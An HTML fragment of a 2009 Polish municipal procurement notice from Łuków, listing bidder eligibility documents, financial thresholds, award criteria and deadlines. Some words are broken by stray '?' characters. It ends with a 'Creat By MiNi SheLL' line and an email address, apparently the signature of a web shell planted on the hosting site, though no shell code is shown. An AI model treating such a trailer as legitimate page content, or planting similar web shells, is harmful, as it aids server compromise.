      wybrana, zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej
      współpracę tych wykonawców, zgodnie z art. 23 Pzp. 
6.   Ofertę wykonawcy wykluczonego uznaje się za odrzuconą, zgodnie z art. 24 ust. 4 Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oddział 3. Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu (jeżeli dotyczy) 
1. 	W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Pzp, Zamawiający żąda: 
1)   aktualnego odpisu z właściwego rejestru albo ak?tualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, przy czym odpis albo zaświadczenie nie może być wystawione wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
2)	aktualnych zaświadczeń: 
a)	właściwego naczelnika urzędu skarbowego oraz 
b)	właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolni?czego Ubezpieczenia Społecznego 
	- potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu, przy czym dokumenty nie mogą być wystawione wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
3) 	aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 Pzp, przy czym informacja nie może być wystawiona wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
4) 	aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 Pzp, przy czym informacja nie może być wystawiona wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
       5)     oświadczenia, zgodnego z art. 22 ust. 1 pkt 1-3 Pzp, o spełnianiu warunków udziału w postępowaniu; 
        6)      oświadczenia, zgodnego z art. 22 ust. 1 pkt 4 Pzp, o spełnianiu warunków udziału 
                 w postępowaniu; 




 2. 	W celu potwierdzenia opisanego przez zama?wiającego warunku posiadania przez wykonawcę niezbędnej wiedzy   i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zamawiający żąda: 
1)	wykazu zawierającego przynajmniej jedną wykonaną robotę budowlaną w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającą swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zo?stały wykonane należycie, przy czym z załączonych dokumentów musi wynikać, że: 
-    co najmniej jedna z wykazanych robót budowlanych swoim rodzajem odpowiada robotom  budowlanym stanowiącym przedmiot zamówienia i wartością nie mniejszą niż 9 000 000,00 PLN brutto,
2)	wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć                      w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia          i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności. 
2a)	pisemnego zobowiązania innych niż wykonawca podmiotów do tego, aby wykonawca mógł dysponować wykazanymi osobami, jeżeli w wykazie, o którym mowa w pkt 2 wykonawca wskazał osoby, którymi będzie dysponował; 
3)   dokumentów stwierdzających, że osoby, którymi dysponuje wykonawca, posiadają wymagane uprawnienia,            a w  szczególności wykonawca załączy do oferty dokumenty potwierdzające aktualną przynależność do właściwej izby samorządu zawodowego i uprawnienia do wykonywania samodzielnych funkcji technicznych                        w budownictwie    w rozumieniu ustawy z dnia 7 lutego 1994 r. Prawo budowlane w zakresie :
                     -      Kierownik robót drogowych - uprawnienia w specjalności konstrukcyjno-inżynieryjnej 
                          w zakresie dróg  i nawierzchni;
- Geodeta - uprawnienia w geodezji i kartografii, w zakresie geodezyjne pomiary sytuacyjno-wysokościowe  realizacyjne i inwentaryzacyjne - co najmniej jedna osoba
3. W celu potwierdzenia opisanego przez zama?wiającego warunku znajdowania się przez wykonawcę 
    w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda:
a)      informacji banku lub spółdzielczej kasy oszczędno?ścio?wo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na łączną kwotę co najmniej  3 000 000,00  zł, dokumenty nie mogą być wystawione wcześniej niż 3 miesiące przed upływem terminu składania ofert.
b)  polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. 
Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy mogą złożyć jedną wspólną polisę potwierdzającą, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
    4. 	Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej    
              stosuje się do § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie
              rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich
              te dokumenty mogą być składane. 
    5. 	Wykonawca ma obowiązek składać dokumenty w formie oryginału lub kopii poświadczonej za  
             zgodność  z oryginałem przez wykonawcę. 
    6. 	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu  
             wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi 
             wątpliwości co do jej prawdziwości. 
     7.    Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, 
             poświadczonym przez wykonawcę. Tłumaczenie nie jest wymagane, jeżeli zamawiający wyraził
             zgodę, o której mowa w art. 9 ust. 3 ustawy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Warunki gwarancji - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> ): www.lukow.pl/bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Łuków ul. Piłsudskiego 17, 21-400 Łuków pok. 15 w godz. 7:30 - 15:30 od poniedziałku do piątku..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2009 godzina 11:00, miejsce: URZĄD MIASTA ŁUKÓW UL. PIŁSUDSKIEGO 17, 21-400 ŁUKÓW POK. 109 SEKRETARIAT.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com